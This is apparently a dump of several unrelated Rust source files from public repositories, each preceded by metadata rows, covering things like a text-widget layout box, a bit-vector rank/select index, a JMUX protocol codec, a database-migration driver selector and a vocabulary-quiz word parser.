else { map[i + j * DIM] = HeightMap::idw(Vec2::new(x, y), &poi); } } } return map; } } impl Entity for HeightMap { fn as_any(&self) -> &dyn Any { self } fn as_any_mut(&mut self) -> &mut dyn Any { self } fn start(&mut self, store: &EntityStore) { let terrain_vert = Mesh::heights_gen_vertices(DIM, &Vec::from(self.points)); let terrain_mesh = Box::new(Mesh::new("terrain", &terrain_vert, 
DIM, true, true, None)); let border_vert = Mesh::wall_gen_vertices(&self.border_wall()); let border_mesh = Box::new(Mesh::new("border", &border_vert, DIM, true, true, None)); store.to_new_queue(terrain_mesh); store.to_new_queue(border_mesh); } }
true
f78e9c4b4d3a91192a8862ec79e20aeef209c17c
Rust
Jason-S-Ross/stylish-stringlike
/src/widget/hbox.rs
UTF-8
6,553
3.125
3
[]
no_license
use crate::text::{Pushable, Width}; use crate::widget::{Fitable, Truncateable}; use std::iter::FromIterator; /// A displayable box of text widgets. pub struct HBox<'a, T: Truncateable> { elements: Vec<Box<dyn Fitable<T> + 'a>>, } impl<'a, T: Truncateable> Default for HBox<'a, T> { fn default() -> Self { HBox { elements: vec![] } } } impl<'a, T: Truncateable> HBox<'a, T> { pub fn new() -> Self { HBox { elements: Vec::new(), } } /// Adds an element. pub fn push(&mut self, element: Box<dyn Fitable<T> + 'a>) { self.elements.push(element); } /// Truncates this widget to a given size. pub fn truncate(&self, width: usize) -> T where T: Pushable<T> + Pushable<T::Output> + Default, { let mut space = width; let mut todo: Vec<(usize, _)> = self .elements .iter() .enumerate() .filter_map(|(index, element)| { if let Width::Bounded(_w) = element.width() { Some((index, element)) } else { None } }) .collect(); let mut to_fit = todo.len(); let mut widths: std::collections::HashMap<usize, usize> = Default::default(); while to_fit > 0 { let target_width: f32 = space as f32 / to_fit as f32; let mut to_pop = vec![]; for (rel_index, (index, element)) in todo.iter().enumerate() { if let Width::Bounded(w) = element.width() { if (w as f32) <= target_width { space -= w; to_fit -= 1; widths.insert(*index, w); to_pop.push(rel_index) } } } for index in to_pop.iter().rev() { todo.remove(*index); } if to_pop.is_empty() { let target_width = space / todo.len(); let rem = space % todo.len(); for (i, (index, _widget)) in todo.iter().enumerate() { let w = if i < rem { target_width + 1 } else { target_width }; space -= w; widths.insert(*index, w); } break; } } let infinite_widths: Vec<(usize, _)> = self .elements .iter() .enumerate() .filter_map(|(index, element)| { if let Width::Unbounded = element.width() { Some((index, element)) } else { None } }) .collect(); if !infinite_widths.is_empty() { let target_width = space / infinite_widths.len(); let rem = space % infinite_widths.len(); for (rel_index, (abs_index, _element)) in infinite_widths.iter().enumerate() { let w = if rel_index < rem { target_width + 1 } else { target_width }; widths.insert(*abs_index, w); } } let mut res: T = Default::default(); let elements = self .elements .iter() .enumerate() .map(move |(i, widget)| widget.truncate(widths[&i])) .flatten(); for elem in elements { res.push(&elem) } res } } impl<'a, T: Truncateable> FromIterator<Box<dyn Fitable<T> + 'a>> for HBox<'a, T> { fn from_iter<I>(iter: I) -> HBox<'a, T> where I: IntoIterator<Item = Box<dyn Fitable<T> + 'a>>, { let mut result: HBox<T> = Default::default(); for item in iter { result.push(item) } result } } #[cfg(test)] mod test { use super::*; use crate::text::*; use crate::widget::{Repeat, TextWidget, TruncationStyle}; use std::borrow::Cow; #[test] fn make_hbox() { let fmt_1 = Tag::new("<1>", "</1>"); let fmt_2 = Tag::new("<2>", "</2>"); let fmt_3 = Tag::new("<3>", "</3>"); let mut spans: Spans<Tag> = Default::default(); spans.push(&Span::new(Cow::Borrowed(&fmt_2), Cow::Borrowed("01234"))); spans.push(&Span::new(Cow::Borrowed(&fmt_3), Cow::Borrowed("56789"))); let truncator = { let mut ellipsis = Spans::<Tag>::default(); ellipsis.push(&Span::new(Cow::Borrowed(&fmt_1), Cow::Borrowed("..."))); TruncationStyle::Left(ellipsis) }; let widget = TextWidget::new(Cow::Borrowed(&spans), Cow::Borrowed(&truncator)); let mut hbox: HBox<Spans<Tag>> = Default::default(); hbox.push(Box::new(widget)); let actual = format!("{}", hbox.truncate(9)); let expected = String::from("<2>01234</2><3>5</3><1>...</1>"); 
assert_eq!(expected, actual); } #[test] fn make_hbox_infinite() { let fmt_1 = Tag::new("<1>", "</1>"); let fmt_2 = Tag::new("<2>", "</2>"); let span = Span::new(Cow::Borrowed(&fmt_2), Cow::Borrowed("=")); let repeat = Repeat::new(span); let truncator = TruncationStyle::Left(Span::new(Cow::Borrowed(&fmt_1), Cow::Borrowed("..."))); let widget = TextWidget::new(Cow::Borrowed(&repeat), Cow::Borrowed(&truncator)); let mut hbox: HBox<Spans<Tag>> = Default::default(); hbox.push(Box::new(widget)); let actual = format!("{}", hbox.truncate(5)); let expected = String::from("<2>==</2><1>...</1>"); assert_eq!(expected, actual); } #[test] fn make_hbox_literal() { let fmt_2 = Tag::new("<2>", "</2>"); let fmt_3 = Tag::new("<3>", "</3>"); let mut spans: Spans<Tag> = Default::default(); spans.push(&Span::new(Cow::Borrowed(&fmt_2), Cow::Borrowed("01234"))); spans.push(&Span::new(Cow::Borrowed(&fmt_3), Cow::Borrowed("56789"))); let truncator = TruncationStyle::Left("..."); let widget = TextWidget::new(Cow::Borrowed(&spans), Cow::Borrowed(&truncator)); let mut hbox: HBox<Spans<Tag>> = Default::default(); hbox.push(Box::new(widget)); let actual = format!("{}", hbox.truncate(9)); let expected = String::from("<2>01234</2><3>5...</3>"); assert_eq!(expected, actual); } }
true
52f83f8b0f6aee4613fc0e4016c6a94ec7e36555
Rust
fredmorcos/attic
/Projects/Crawl (Rust)/crawl-hyper-2/src/main.rs
UTF-8
1,908
2.71875
3
[ "Unlicense" ]
permissive
#![warn(clippy::all)] use futures::future::{self, Future}; use futures::stream::Stream; use hyper::{ rt::{self, Future as HyperFuture}, service::service_fn, Body, Error as HyperError, Method, Request, Response, Server, StatusCode, }; use std::{ error::Error, fmt::{self, Display}, net::{AddrParseError, SocketAddr}, str, sync::{Arc, Mutex}, }; fn index( req: Request<Body>, name: Arc<Mutex<String>>, ) -> impl HyperFuture<Item = Response<Body>, Error = HyperError> + Send { let mut res = Response::new(Body::empty()); match (req.method(), req.uri().path()) { (&Method::POST, "/") => match name.lock() { Ok(name) => { *name = req .into_body() .map_err(Error::from) .concat2() .and_then(|c| str::from_utf8(&c).map(str::to_owned).map_err(Error::from)) } Err(e) => return future::err(String::new("Cannot access domain")), }, _ => *res.status_mut() = StatusCode::NOT_FOUND, } future::ok(res) } #[derive(Debug)] enum ScraperError { AddressParseError(AddrParseError), } impl Display for ScraperError { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { match self { ScraperError::AddressParseError(e) => write!(f, "Cannot parse network address: {}", e), } } } impl Error for ScraperError {} fn main() -> Result<(), ScraperError> { let addr = "127.0.0.1:3000" .parse::<SocketAddr>() .map_err(ScraperError::AddressParseError)?; let dom = Arc::new(Mutex::new(String::new())); let service = || service_fn(|req| index(req, dom.clone())); let server = Server::bind(&addr) .serve(service) .map_err(|e| eprintln!("Server error: {}", e)); println!("Listening on {}", addr); rt::run(server); Ok(()) }
true
40c1c621d3baba83094d0b6ee775c1e67347cac5
Rust
HolisticCoders/shelob-core
/src/add.rs
UTF-8
444
3.140625
3
[ "MIT" ]
permissive
use crate::attribute::Attribute; use crate::node::Node; #[derive(Debug)] pub struct Add { a: Attribute, b: Attribute, } impl Node for Add { fn new() -> Self { Add { a: Attribute::new(), b: Attribute::new(), } } fn evaluate(&self) { println!("Evaluating!") } fn attributes(&self) -> Vec<&Attribute> { vec![&self.a, &self.b] } }
true
1741a78195c5e35cbc5da2ecd7a1cfc3636dbbf2
Rust
pwin/ferricstore
/src/structure/bitindex.rs
UTF-8
7,455
3.015625
3
[ "Apache-2.0" ]
permissive
use byteorder::{ByteOrder,BigEndian}; use super::bitarray::*; use super::logarray::*; use futures::prelude::*; use tokio::prelude::*; // a block is 64 bit, which is the register size on modern architectures // Block size is not tunable, and therefore no const is defined here. /// The amount of 64-bit blocks that go into a superblock. const SBLOCK_SIZE: usize = 52; #[derive(Clone)] pub struct BitIndex<'a> { array: BitArray<'a>, blocks: LogArray<'a>, sblocks: LogArray<'a> } impl<'a> BitIndex<'a> { pub fn from_parts(array: BitArray<'a>, blocks: LogArray<'a>, sblocks: LogArray<'a>) -> BitIndex<'a> { assert!(sblocks.len() == (blocks.len() + SBLOCK_SIZE - 1) / SBLOCK_SIZE); assert!(blocks.len() == (array.len() + 63) / 64); BitIndex { array, blocks, sblocks } } fn block_bits(&self, block_index: usize) -> &[u8] { let bit_index = block_index * 8; &self.array.bits()[bit_index..bit_index+8] } pub fn len(&self) -> usize { self.array.len() } pub fn get(&self, index: u64) -> bool { self.array.get(index as usize) } pub fn rank(&self, index: u64) -> u64 { let block_index = index / 64; let sblock_index = block_index / SBLOCK_SIZE as u64; let block_rank = self.blocks.entry(block_index as usize); let sblock_rank = self.sblocks.entry(sblock_index as usize); let bits = self.block_bits(block_index as usize); assert!(bits.len() == 8); let mut bits_num = BigEndian::read_u64(bits); bits_num >>= 63 - index % 64; // shift out numbers we don't care about let bits_rank = bits_num.count_ones() as u64; sblock_rank - block_rank + bits_rank } fn select_sblock(&self, rank: u64) -> usize { let mut start = 0; let mut end = self.sblocks.len()-1; let mut mid; loop { mid = (start + end)/2; if start == end { break; } let r = self.sblocks.entry(mid); match r < rank { true => start = mid + 1, false => end = mid } } mid } fn select_block(&self, sblock: usize, subrank: u64) -> usize { let mut start = sblock * SBLOCK_SIZE; let mut end = start + SBLOCK_SIZE-1; if end > self.blocks.len() - 1 { end = self.blocks.len() - 1; } let mut mid; // inside a superblock, block subranks cache superblock_rank - sum_i<block_(blockrank_i). // Or another way to think of this, each block subrank specifies where in the superblock // this block starts. if a superblock has a rank of 1000, and the first block has a rank of 50, // the second block will have a subrank of 1000-50=950. // Suppose the second block has a rank of 20, then the third block will have a subrank of 950-20=930. // // To find the proper block, we're trying to find the rightmost block with a subrank greater than the // subrank we're looking for. 
loop { mid = (start + end + 1)/2; if start == end { break; } let r = self.blocks.entry(mid); match r > subrank { true => start = mid, false => end = mid - 1 } } mid } pub fn select(&self, rank: u64) -> u64 { let sblock = self.select_sblock(rank); let sblock_rank = self.sblocks.entry(sblock); let block = self.select_block(sblock, sblock_rank - rank); let block_subrank = self.blocks.entry(block); let rank_in_block = rank - (sblock_rank - block_subrank); assert!(rank_in_block <= 64); let bits = self.block_bits(block); let mut bits_num = BigEndian::read_u64(bits); let mut tally = rank_in_block; for i in 0..64 { if bits_num & 0x8000000000000000 != 0 { tally -= 1; if tally == 0 { return block as u64 * 64 + i; } } bits_num <<= 1; } panic!("reached end of select function without a result"); } } pub fn build_bitindex<R:'static+AsyncRead,W1:'static+AsyncWrite, W2:'static+AsyncWrite>(bitarray:R, blocks:W1, sblocks:W2) -> Box<dyn Future<Item=(W1, W2),Error=std::io::Error>> { let block_stream = bitarray_stream_blocks(bitarray); // the following widths are unoptimized, but should always be large enough let blocks_builder = LogArrayFileBuilder::new(blocks, 64-(SBLOCK_SIZE*64).leading_zeros() as u8); let sblocks_builder = LogArrayFileBuilder::new(sblocks, 64); // we chunk block_stream into blocks of SBLOCK size for further processing Box::new(block_stream.chunks(SBLOCK_SIZE) .fold((sblocks_builder, blocks_builder, 0), |(sblocks_builder, blocks_builder, tally), chunk| { let block_ranks: Vec<u8> = chunk.iter().map(|b| b.count_ones() as u8).collect(); let sblock_subrank = block_ranks.iter().fold(0u64, |s,&i| s+i as u64); let sblock_rank = sblock_subrank + tally; stream::iter_ok(block_ranks) .fold((blocks_builder, sblock_subrank), |(builder, rank), block_rank| builder.push(rank as u64) .map(move |blocks_builder| (blocks_builder, rank - block_rank as u64))) .and_then(move |(blocks_builder, _)| sblocks_builder.push(sblock_rank) .map(move |sblocks_builder| (sblocks_builder, blocks_builder, sblock_rank))) }) .and_then(|(sblocks_builder, blocks_builder, _)| blocks_builder.finalize() .and_then(|blocks_file| sblocks_builder.finalize() .map(move |sblocks_file| (blocks_file, sblocks_file))))) // TODO it would be better to return the various streams here. However, we have no access to block_stream as it was consumed. } #[cfg(test)] mod tests { use super::*; use tokio_io::io::AllowStdIo; use std::io::Cursor; #[test] pub fn rank_and_select_work() { let ba_builder = BitArrayFileBuilder::new(AllowStdIo::new(Vec::new())); let contents = (0..).map(|n| n % 3 == 0).take(123456); let ba_stored = ba_builder.push_all(stream::iter_ok(contents)) .and_then(|b|b.finalize()) .wait() .unwrap() .into_inner(); let c = Cursor::new(ba_stored.clone()); let index_blocks = AllowStdIo::new(Vec::new()); let index_sblocks = AllowStdIo::new(Vec::new()); let (blocks, sblocks) = build_bitindex(c, index_blocks, index_sblocks) .map(|(b,s)|(b.into_inner(),s.into_inner())) .wait() .unwrap(); let ba = BitArray::from_bits(&ba_stored); let blocks_logarray = LogArray::parse(&blocks).unwrap(); let sblocks_logarray = LogArray::parse(&sblocks).unwrap(); let index = BitIndex::from_parts(ba, blocks_logarray, sblocks_logarray); for i in 0..123456 { assert_eq!(i/3 + 1, index.rank(i)); } for i in 1..(123456/3) { assert_eq!((i-1)*3,index.select(i)); } } }
true
3aa13e6b4d0cb994a01ade97e8f6ae0bf2e8acc3
Rust
Lyr-7D1h/rust_tutorials
/collections/src/main.rs
UTF-8
1,973
3.28125
3
[]
no_license
use std::io; use std::collections::HashMap; fn main() { mean_test(); manage_comp_io(); } fn manage_comp_io() { let mut departments : HashMap<String, Vec<String>> = HashMap::new(); let mut input = String::new(); while !input.eq("e") { input.clear(); println!("'a (name) (department)' to add someone\n'l' to list all employees\n'e' to exit"); io::stdin().read_line(&mut input).expect("Failed to read stdin"); input.truncate(input.len() - 1); println!(""); match input[0..1].as_ref() { "l" => { println!("Employees: {:?}", departments) } "a" => { // let i : String = input.deref(); let mut arguments:Vec<&str> = input.split(" ").collect(); arguments.retain(|&arg| arg != ""); if arguments.len() != 3 { println!("No 2 arguments given"); continue } let employees = departments.entry(String::from(arguments[2])).or_insert(vec![]); employees.push(String::from(arguments[1])); println!("Adding {} to {}", arguments[1], arguments[2]); } "e" => { println!("Exiting Program"); continue } _ => { println!("Unrecognized Command {}", input); } } println!(""); } } fn mean_test() { let numbers1 = vec![4, 5, 6, 2, 5, 3]; let numbers2: Vec<i32> = vec![-2, 23, 1, -50]; let numbers3 = vec![100, 2, 4, 0, 1, 200]; println!("Average: {}", calculate_mean(&numbers1)); println!("Average: {}", calculate_mean(&numbers2)); println!("Average: {}", calculate_mean(&numbers3)); } fn calculate_mean(list: &Vec<i32>) -> i32 { let mut total = 0; for val in list { total += val; } total/list.len() as i32 }
true
63fa5e67d1c8896d8620f001b3c45b9394e8647b
Rust
leshow/exercism
/hackerrank/src/l4sum.rs
UTF-8
1,209
3.65625
4
[]
no_license
// 18. 4Sum // Medium // Given an array nums of n integers and an integer target, are there elements // a, b, c, and d in nums such that a + b + c + d = target? Find all unique // quadruplets in the array which gives the sum of target. // Note: // The solution set must not contain duplicate quadruplets. // Example: // Given array nums = [1, 0, -1, 0, -2, 2], and target = 0. // A solution set is: // [ // [-1, 0, 0, 1], // [-2, -1, 1, 2], // [-2, 0, 0, 2] // ] // it's slow but it works: pub fn four_sum(nums: Vec<i32>, target: i32) -> Vec<Vec<i32>> { use std::collections::HashSet; if nums.len() < 4 { return Vec::new(); } let mut ret = HashSet::new(); for i in 0..(nums.len() - 3) { for j in (i + 1)..(nums.len() - 2) { for k in (j + 1)..(nums.len() - 1) { for t in (k + 1)..nums.len() { if nums[i] + nums[j] + nums[k] + nums[t] == target { let mut ins = vec![nums[i], nums[j], nums[k], nums[t]]; ins.sort(); ret.insert(ins); } } } } } ret.drain().collect::<Vec<_>>() }
true
2781d7ca551ed6f54e7704f861e99cf544777f77
Rust
Devolutions/devolutions-gateway
/crates/jmux-proxy/src/codec.rs
UTF-8
3,915
2.90625
3
[ "Apache-2.0", "MIT" ]
permissive
use anyhow::Context as _; use bytes::BytesMut; use jmux_proto::{Header, Message}; use tokio_util::codec::{Decoder, Encoder}; /// This is a purely arbitrary number pub const MAXIMUM_PACKET_SIZE_IN_BYTES: usize = 4096; pub struct JmuxCodec; impl Decoder for JmuxCodec { type Item = Message; type Error = anyhow::Error; fn decode(&mut self, src: &mut BytesMut) -> Result<Option<Self::Item>, Self::Error> { if src.len() < Header::SIZE { // Not enough data to read length marker. return Ok(None); } // Read length marker let mut length_bytes = [0u8; 2]; length_bytes.copy_from_slice(&src[1..3]); let length = u16::from_be_bytes(length_bytes) as usize; if length > MAXIMUM_PACKET_SIZE_IN_BYTES { anyhow::bail!( "Received JMUX packet is exceeding the maximum packet size: {} (max is {})", length, MAXIMUM_PACKET_SIZE_IN_BYTES ); } if src.len() < length { // The full packet has not arrived yet. // Reserve more space in the buffer (good performance-wise). src.reserve(length - src.len()); // Inform the Framed that more bytes are required to form the next frame. return Ok(None); } // `split_to` is modifying src such that it no longer contains this frame (`advance` could have been used as well) let packet_bytes = src.split_to(length).freeze(); // Parse the JMUX packet contained in this frame let packet = Message::decode(packet_bytes).context("Couldn’t process frame into a valid JMUX packet")?; // Hands the frame Ok(Some(packet)) } } impl Encoder<Message> for JmuxCodec { type Error = anyhow::Error; fn encode(&mut self, item: Message, dst: &mut BytesMut) -> Result<(), Self::Error> { if item.size() > MAXIMUM_PACKET_SIZE_IN_BYTES { anyhow::bail!( "Attempted to send a JMUX packet whose size is too big: {} (max is {})", item.size(), MAXIMUM_PACKET_SIZE_IN_BYTES ); } item.encode(dst)?; Ok(()) } } #[cfg(test)] pub mod tests { use super::*; use bytes::Bytes; use futures_util::StreamExt; use std::pin::Pin; use std::task::{Context, Poll}; use tokio::io::{AsyncRead, ReadBuf}; use tokio_util::codec::FramedRead; struct MockAsyncReader { raw_msg: Vec<u8>, } impl AsyncRead for MockAsyncReader { fn poll_read( mut self: Pin<&mut Self>, _cx: &mut Context<'_>, buf: &mut ReadBuf<'_>, ) -> Poll<std::io::Result<()>> { if buf.remaining() > 0 { let amount = std::cmp::min(buf.remaining(), self.raw_msg.len()); buf.put_slice(&self.raw_msg[0..amount]); self.raw_msg.drain(0..amount); Poll::Ready(Ok(())) } else { Poll::Pending } } } #[tokio::test] async fn jmux_decoder() { let raw_msg = &[ 100, // msg type 0, 34, // msg size 0, // msg flags 0, 0, 0, 1, // sender channel id 0, 0, 4, 0, // initial window size 4, 0, // maximum packet size 116, 99, 112, 58, 47, 47, 103, 111, 111, 103, 108, 101, 46, 99, 111, 109, 58, 52, 52, 51, // destination url: tcp://google.com:443 ]; let expected_message = Message::decode(Bytes::from_static(raw_msg)).unwrap(); let reader = MockAsyncReader { raw_msg: raw_msg.to_vec(), }; let mut framed_reader = FramedRead::new(reader, JmuxCodec); let frame = framed_reader.next().await.unwrap().unwrap(); assert_eq!(expected_message, frame); } }
true
67a6f5f89cff656eefd147a9af2a353b976800b9
Rust
ramn/dbmigrate
/src/drivers/mod.rs
UTF-8
1,269
2.921875
3
[ "Apache-2.0", "LicenseRef-scancode-unknown-license-reference", "MIT" ]
permissive
//! Driver interface and implementations use url::{SchemeType, UrlParser}; use errors::{MigrateResult, invalid_url}; mod mysql; mod postgres; pub trait Driver { fn ensure_migration_table_exists(&self); fn remove_migration_table(&self); fn get_current_number(&self) -> i32; fn set_current_number(&self, number: i32); fn migrate(&self, migration: String, number: i32) -> MigrateResult<()>; } // Creating our own scheme mapper with the default ports fn db_scheme_type_mapper(scheme: &str) -> SchemeType { match scheme { "postgres" => SchemeType::Relative(5432), "mysql" => SchemeType::Relative(3306), _ => SchemeType::NonRelative, } } /// Returns a driver instance depending on url pub fn get_driver(url: &str) -> MigrateResult<Box<Driver>> { // Mysql driver does not allow connecting using a url so we need to parse it let mut parser = UrlParser::new(); parser.scheme_type_mapper(db_scheme_type_mapper); let parsed = parser.parse(url).unwrap(); match parsed.scheme.as_ref() { "postgres" => postgres::Postgres::new(url).map(|d| Box::new(d) as Box<Driver>), "mysql" => mysql::Mysql::new(parsed).map(|d| Box::new(d) as Box<Driver>), _ => Err(invalid_url(url)) } }
true
46fd28969f2de610ec8a3e4b2cc635601d5fdc45
Rust
bqqbarbhg/adventofcode
/2022/05/part2.rs
UTF-8
1,781
3.109375
3
[]
no_license
mod common; use std::{io::{self, BufRead}}; use std::vec::Vec; use regex::Regex; use common::{match_iter, match_capture, ensure_size}; fn get_disjoint<T>(ts: &mut [T], a: usize, b: usize) -> (&mut T, &mut T) { assert!(a != b, "a ({}) and b ({}) must be disjoint", a, b); assert!(a < ts.len(), "a ({}) is out of bounds", a); assert!(b < ts.len(), "b ({}) is out of bounds", b); if a < b { let (al, bl) = ts.split_at_mut(b); (&mut al[a], &mut bl[0]) } else { let (bl, al) = ts.split_at_mut(a); (&mut al[0], &mut bl[b]) } } type Action = (usize, usize, usize); fn main() { let re_top = Regex::new(r" {4}|\[([A-Z])\]").unwrap(); let re_action = Regex::new(r"move (\d+) from (\d+) to (\d+)").unwrap(); let mut stacks: Vec<Vec<char>> = Vec::new(); let mut input = io::stdin().lock().lines() .flat_map(|l| l.ok()); for line in &mut input { if line.trim().is_empty() { break } for (ix, ch) in match_iter::<char>(&re_top, &line).enumerate() { if let Some(ch) = ch { ensure_size(&mut stacks, ix + 1); stacks[ix].push(ch); } } } for stack in &mut stacks { stack.reverse() } for line in input { if let Some((num, src, dst)) = match_capture::<Action>(&re_action, &line) { let (src, dst) = get_disjoint(&mut stacks, src - 1, dst - 1); assert!(num <= src.len(), "Trying to pop {} from {}", num, src.len()); let pos = src.len() - num; dst.extend_from_slice(&src[pos..]); src.truncate(pos); } } let letters = stacks.iter().map(|s| s.last().expect("Stack is empty")); println!("{}", letters.collect::<String>()); }
true
9852efb952fa6c58f4691b4a4e4ff7eb49925193
Rust
Lol3rrr/rust-facomp
/src/frontend/ir/pretty_print.rs
UTF-8
3,154
3.34375
3
[]
no_license
use super::{IRExpression, IRFunction, IRNode}; fn print_expression(prefix: &str, exp: &IRExpression) { let next_prefix = format!("{} ", prefix); match exp { &IRExpression::Value(ref value) => { println!("{}Value: '{:?}'", prefix, value); } &IRExpression::Variable(ref name) => { println!("{}Variable: '{:?}'", prefix, name); } &IRExpression::Operation(ref op, ref exps) => { println!("{}Operation-'{:?}':", prefix, op); for exp in exps { print_expression(&next_prefix, exp); } } &IRExpression::Call(ref name, ref exp) => { println!("{}Call-'{}':", prefix, name); for tmp in exp { print_expression(&next_prefix, tmp); } } &IRExpression::Noop => { println!("{}Noop", prefix); } }; } fn get_next_prefix(current: &str) -> String { format!("{} ", current) } fn print_node(prefix: &str, node: &IRNode) { let next_prefix = get_next_prefix(prefix); match node { &IRNode::Assignment(ref name, ref exp) => { println!("{}Assignment-'{}':", prefix, name); print_expression(&next_prefix, exp); } &IRNode::DeclareVariable(ref name, ref exp) => { println!("{}DeclareVariable-'{}':", prefix, name); println!("{}{:?}", next_prefix, exp); } &IRNode::Conditional(ref comparison, ref nodes) => { println!("{}Conditional:", prefix); println!("{}{:?}", next_prefix, comparison); let n_next_prefix = get_next_prefix(&next_prefix); for tmp in nodes { print_nodes(&n_next_prefix, tmp); } } &IRNode::Loop(ref comparison, ref nodes) => { println!("{}Loop:", prefix); println!("{}{:?}", next_prefix, comparison); let n_next_prefix = get_next_prefix(&next_prefix); for tmp in nodes { print_nodes(&n_next_prefix, tmp); } } &IRNode::Return(ref raw_exp) => { match raw_exp { Some(exp) => { println!("{}Return:", prefix); print_expression(&next_prefix, exp); } None => println!("{}Return", prefix), }; } &IRNode::SingleExpression(ref exp) => { println!("{}Expression:", prefix); print_expression(&next_prefix, exp); } }; } fn print_nodes(prefix: &str, nodes: &[IRNode]) { for node in nodes.iter() { print_node(prefix, node); } } pub fn pretty_print(ir: &std::collections::HashMap<String, IRFunction>) { for (_, func) in ir { println!("Function-'{}':", func.name); println!(" Arguments:"); for param in func.parameters.iter() { println!(" {}: {:?}", param.name, param.param_type); } for statement in func.statements.iter() { println!(" Statement:"); print_nodes(" ", statement); } } }
true
d1f92512b9bbcf0d1f1cb837aaaf833666aab7eb
Rust
sym233/leetcode_problems
/1010. Pairs of Songs With Total Durations Divisible by 60/1010. Pairs of Songs With Total Durations Divisible by 60.rs
UTF-8
339
2.515625
3
[]
no_license
impl Solution { pub fn num_pairs_divisible_by60(time: Vec<i32>) -> i32 { const T: usize = 60usize; let mut arr = [0; T]; let mut count = 0; for &n in time.iter() { let n = n as usize % T; count += arr[(T - n) % T]; arr[n] += 1; } return count } }
true
f3f2589379486646800ccbdc2a97bb6fc3f5d987
Rust
aaronjamesmarshallau/spaghetti
/src/conversion/units/mod.rs
UTF-8
3,319
3
3
[]
no_license
use diesel::backend::Backend; use diesel::deserialize::FromSql; use diesel::serialize::Output; use diesel::sql_types::SmallInt; use diesel::types::ToSql; use serde::{Deserialize, Serialize}; #[derive(Serialize, Deserialize, Debug, Clone, Copy, AsExpression, FromSqlRow)] #[sql_type = "SmallInt"] pub enum UnitOfMeasurement { None, // Units of Mass (Metric) Milligrams, Grams, Kilograms, // Units of Mass (Imperials) Ounces, Pounds, // Units of Volume (general) Teaspoons, Tablespoons, Cups, // Units of Volume (liquid, metric) Millilitres, Litres, // Units of Volume (liquid, imperial) FluidOunces, // Miscellaneous Pinch, Dash, } impl<DB: Backend> ToSql<SmallInt, DB> for UnitOfMeasurement where i16: ToSql<SmallInt, DB>, { fn to_sql<W>(&self, out: &mut Output<W, DB>) -> diesel::serialize::Result where W: std::io::Write, { i16::from(*self).to_sql(out) } } impl<DB: Backend> FromSql<SmallInt, DB> for UnitOfMeasurement where i16: FromSql<SmallInt, DB>, { fn from_sql(bytes: Option<&DB::RawValue>) -> diesel::deserialize::Result<Self> { let small_int = i16::from_sql(bytes)?; Ok(UnitOfMeasurement::from(small_int)) } } impl From<i16> for UnitOfMeasurement { fn from(num: i16) -> UnitOfMeasurement { match num { // Units of Mass (Metric) 1 => UnitOfMeasurement::Milligrams, 2 => UnitOfMeasurement::Grams, 3 => UnitOfMeasurement::Kilograms, // Units of Mass (Imperials) 4 => UnitOfMeasurement::Ounces, 5 => UnitOfMeasurement::Pounds, // Units of Volume (general) 6 => UnitOfMeasurement::Teaspoons, 7 => UnitOfMeasurement::Tablespoons, 8 => UnitOfMeasurement::Cups, // Units of Volume (liquid, metric) 9 => UnitOfMeasurement::Millilitres, 10 => UnitOfMeasurement::Litres, // Units of Volume (liquid, imperial) 11 => UnitOfMeasurement::FluidOunces, // Miscellaneous 12 => UnitOfMeasurement::Pinch, 13 => UnitOfMeasurement::Dash, // None _ => UnitOfMeasurement::None, } } } impl From<UnitOfMeasurement> for i16 { fn from(unit: UnitOfMeasurement) -> i16 { match unit { // Units of Mass (Metric) UnitOfMeasurement::Milligrams => 1, UnitOfMeasurement::Grams => 2, UnitOfMeasurement::Kilograms => 3, // Units of Mass (Imperials) UnitOfMeasurement::Ounces => 4, UnitOfMeasurement::Pounds => 5, // Units of Volume (general) UnitOfMeasurement::Teaspoons => 6, UnitOfMeasurement::Tablespoons => 7, UnitOfMeasurement::Cups => 8, // Units of Volume (liquid, metric) UnitOfMeasurement::Millilitres => 9, UnitOfMeasurement::Litres => 10, // Units of Volume (liquid, imperial) UnitOfMeasurement::FluidOunces => 11, // Miscellaneous UnitOfMeasurement::Pinch => 12, UnitOfMeasurement::Dash => 13, // None _ => 0, } } }
true
051044d6ef65a3a3d24a1da26b4758012ec9410c
Rust
Axect/Woroxide
/src/parser/conv.rs
UTF-8
2,352
2.9375
3
[]
no_license
extern crate puruda; use crate::parser::word::{TotalWords, Word, Words}; use std::fs::File; use std::io::{BufRead, BufReader}; use puruda::*; use rand::prelude::*; #[allow(dead_code)] pub fn smart_to_total_words() -> TotalWords { let mut words_vec: Vec<Words> = Vec::new(); for i in 1..22 { let words = smart_to_words(i); words_vec.push(words); } TotalWords::new(words_vec) } #[allow(dead_code)] pub fn smart_to_words_vec() -> Vec<Words> { let mut words_vec: Vec<Words> = Vec::new(); for i in 1..22 { let words = smart_to_words(i); words_vec.push(words); } words_vec } pub fn smart_to_words(num: usize) -> Words { let chap = num - 1; let word_file = File::open(&format!("word/word_smart/word{}.txt", chap)) .expect(&format!("Can't open word{}.txt", chap)); let mean_file = File::open(&format!("word/word_smart/mean{}.txt", chap)) .expect(&format!("Can't open mean{}.txt", chap)); let word_reader = BufReader::new(word_file); let mean_reader = BufReader::new(mean_file); let mut word_vec: Vec<Word> = Vec::new(); for (word, mean) in word_reader.lines().zip(mean_reader.lines()) { match (word, mean) { (Ok(w), Ok(m)) => { let word = Word::new(w, m); word_vec.push(word); } _ => assert!(false, "Can't parse word & mean"), } } Words::new(num, word_vec) } pub fn toeic_to_words_vec() -> Vec<Words> { let col: Col2<Vec<String>, Vec<String>> = Col2::read_csv("word/toeic_327.csv", ',').expect("Can't read csv"); let words = col.c1(); let means = col.c2(); let mut word_vec: Vec<Word> = Vec::new(); for i in 0 .. words.len() { let word = Word::new(words[i].clone(), means[i].clone()); word_vec.push(word); } word_vec.shuffle(&mut thread_rng()); let mut words_vec: Vec<Words> = Vec::new(); let mut word_iter = word_vec.into_iter(); for i in 30 .. 38 { let mut w_vec: Vec<Word> = Vec::new(); for _j in 0 .. 40 { w_vec.push(word_iter.next().unwrap()); } let ws = Words::new(i, w_vec); words_vec.push(ws); } let w_vec = word_iter.collect::<Vec<Word>>(); let ws = Words::new(38, w_vec); words_vec.push(ws); words_vec }
true
daacdb035f25e4a97c1af6f84d3a4aeead0eb2c4
Rust
medsec/catena-rust
/src/default_instances/dragonfly.rs
UTF-8
1,760
2.90625
3
[]
no_license
